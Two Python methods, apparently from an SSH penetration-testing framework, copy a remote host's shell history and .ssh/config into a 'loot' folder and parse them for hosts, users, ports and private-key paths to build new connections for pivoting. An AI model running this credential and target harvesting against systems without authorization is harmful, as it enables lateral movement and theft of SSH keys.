Ejemplo n.º 1
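    async def gatherFromHistory(self, historyFile):
        """Copy a remote shell history file locally and record the SSH targets it names.

        The file is fetched with ``asyncssh.scp`` into the workspace ``loot``
        folder, then every line that starts with ``ssh `` is parsed for a
        destination (``[user@]host``), a ``-p`` port and a ``-i`` identity
        file. New users are appended to ``self.newUsers`` and, when both a
        user and an identity were found, one ``Connection`` per resolved
        endpoint is saved and appended to ``self.newConnections``.

        The history file is content controlled by the remote host, so it is
        treated as untrusted input: it only ever feeds the parser below and
        the local file name is stripped of path separators.

        Args:
            historyFile: path of the history file on the remote host.

        Returns:
            None. A failed download is printed and also returns None.
        """
        lootFolder = os.path.join(self.wspaceFolder, "loot")
        # Endpoint, user name and history path all originate from the remote
        # side or from previously harvested data, so separators are removed
        # from the whole name (not only from historyFile) to keep the copy
        # inside the loot folder.
        filename = "_".join((
            str(self.connection.getEndpoint()).replace(":", "-"),
            str(self.connection.getUser()),
            historyFile,
        )).replace("/", "_").replace(os.sep, "_")
        filepath = os.path.join(lootFolder, filename)
        try:
            await asyncssh.scp((self.socket, historyFile), filepath)
        except Exception as e:
            print(e)
            return None
        with open(filepath, "r", errors="ignore") as dledFile:
            data = dledFile.read()

        # ssh switches that take no value. Any other "-x" word is still
        # assumed to consume the following word, as before.
        noArgFlags = set("46AaCfGgKkMNnqsTtVvXxYy")

        for line in data.splitlines():
            if not re.search(r'^ *ssh ', line):
                continue
            pending = ""
            hostname = None
            port = None
            user = None
            identity = None

            for word in line.split()[1:]:
                if pending:
                    # This word is the value of the option seen just before.
                    if pending == "identity":
                        identity = word[2:] if word[:2] == '~/' else word
                    elif pending == "port":
                        port = word
                    pending = ""
                elif word[0] == "-":
                    if word == "-i":
                        pending = "identity"
                    elif word == "-p":
                        pending = "port"
                    elif len(word) > 1 and all(c in noArgFlags for c in word[1:]):
                        # Bare switch such as -v or -At: the next word is not
                        # its value, so it must not be swallowed (it may be
                        # the destination itself).
                        continue
                    else:
                        pending = word
                elif hostname is None:
                    if '@' in word:
                        user, hostname = word.split("@", 1)
                    else:
                        hostname = word
                else:
                    # First plain word after the destination starts the remote
                    # command; its arguments (e.g. "ls -i") are not ssh options.
                    break

            if hostname is None:
                continue
            endpoints = await self.hostnameToIP(hostname, port)
            if user is not None:
                user = User(user)
                # Users found through an out-of-scope connection are marked
                # out of scope as well.
                if not self.connection.inScope():
                    user.unscope()
                if user.getId() is None:
                    user.setFound(self.connection.getEndpoint())
                    user.save()
                    self.newUsers.append(user)
            if identity is not None:
                identity = await self.getKeyToCreds(identity, ".")
            if user is not None and identity is not None:
                for endpoint in endpoints:
                    conn = Connection(endpoint, user, identity)
                    conn.save()
                    self.newConnections.append(conn)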
Ejemplo n.º 2
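 async def gatherFromConfig(self):
     """Copy the remote ``.ssh/config`` locally and record the hosts it declares.

     The file is fetched with ``asyncssh.scp`` into the workspace ``loot``
     folder and read block by block. For every ``Host`` block other than
     ``*`` the ``HostName`` (or the first host pattern), ``Port``, ``User``
     and ``IdentityFile`` values are collected; new users are appended to
     ``self.newUsers`` and, when both a user and an identity are present,
     one ``Connection`` per resolved endpoint is saved and appended to
     ``self.newConnections``.

     The config file is content controlled by the remote host, so it is
     parsed as untrusted input: blank, comment and single-token lines are
     skipped instead of raising, and directives outside a ``Host`` block
     are ignored.

     Returns:
         None. A failed download also returns None.
     """
     lootFolder = os.path.join(self.wspaceFolder, "loot")
     # The endpoint and user name may come from previously harvested data;
     # strip path separators so the copy stays inside the loot folder.
     filename = (
         str(self.connection.getEndpoint()).replace(":", "-")
         + "_" + str(self.connection.getUser()) + "_.ssh_config"
     ).replace("/", "_").replace(os.sep, "_")
     filepath = os.path.join(lootFolder, filename)
     try:
         await asyncssh.scp((self.socket, ".ssh/config"), filepath)
     except Exception:
         return None
     with open(filepath, 'r', errors='replace') as f:
         data = f.read()

     async def recordHost(entry):
         # Turn one finished Host block into User / Connection records.
         if entry is None or entry["name"] == "*":
             return
         host = entry.get("host", entry["name"])
         port = entry.get("port")
         endpoints = await self.hostnameToIP(host, port)
         user = None
         identity = None
         if "user" in entry:
             user = User(entry["user"])
             # Users found through an out-of-scope connection are marked
             # out of scope as well.
             if not self.connection.inScope():
                 user.unscope()
             if user.getId() is None:
                 user.setFound(self.connection.getEndpoint())
                 user.save()
                 self.newUsers.append(user)
         if "identity" in entry:
             identity = await self.getKeyToCreds(entry["identity"], ".")
         if user is not None and identity is not None:
             for endpoint in endpoints:
                 conn = Connection(endpoint, user, identity)
                 conn.save()
                 self.newConnections.append(conn)

     curHost = None
     for line in data.split('\n'):
         stripped = line.strip()
         if not stripped or stripped.startswith("#"):
             continue
         # Keyword and value may be separated by any run of spaces or tabs.
         # NOTE(review): the "Keyword=value" form is not split here; such
         # lines are ignored rather than parsed.
         fields = stripped.split(None, 1)
         key = fields[0].lower()
         val = fields[1] if len(fields) == 2 else ""

         if key in ("host", "match"):
             # A new block starts: flush the previous one first. A Match
             # block (or a Host line without a pattern) opens no entry, so
             # its directives are not attributed to the previous host.
             await recordHost(curHost)
             curHost = None
             if key == "host" and val:
                 curHost = {"name": val.split()[0]}
             continue

         if curHost is None or not val:
             # Global directive before any Host block, or a keyword with no
             # value: nothing to attach it to.
             continue
         if key == "user":
             curHost['user'] = val
         elif key == "port":
             curHost['port'] = val
         elif key == "hostname":
             curHost['host'] = val
         elif key == "identityfile":
             if val[:2] == '~/':
                 val = val[2:]
             curHost['identity'] = val

     # The last block has no following Host line to trigger its flush.
     await recordHost(curHost)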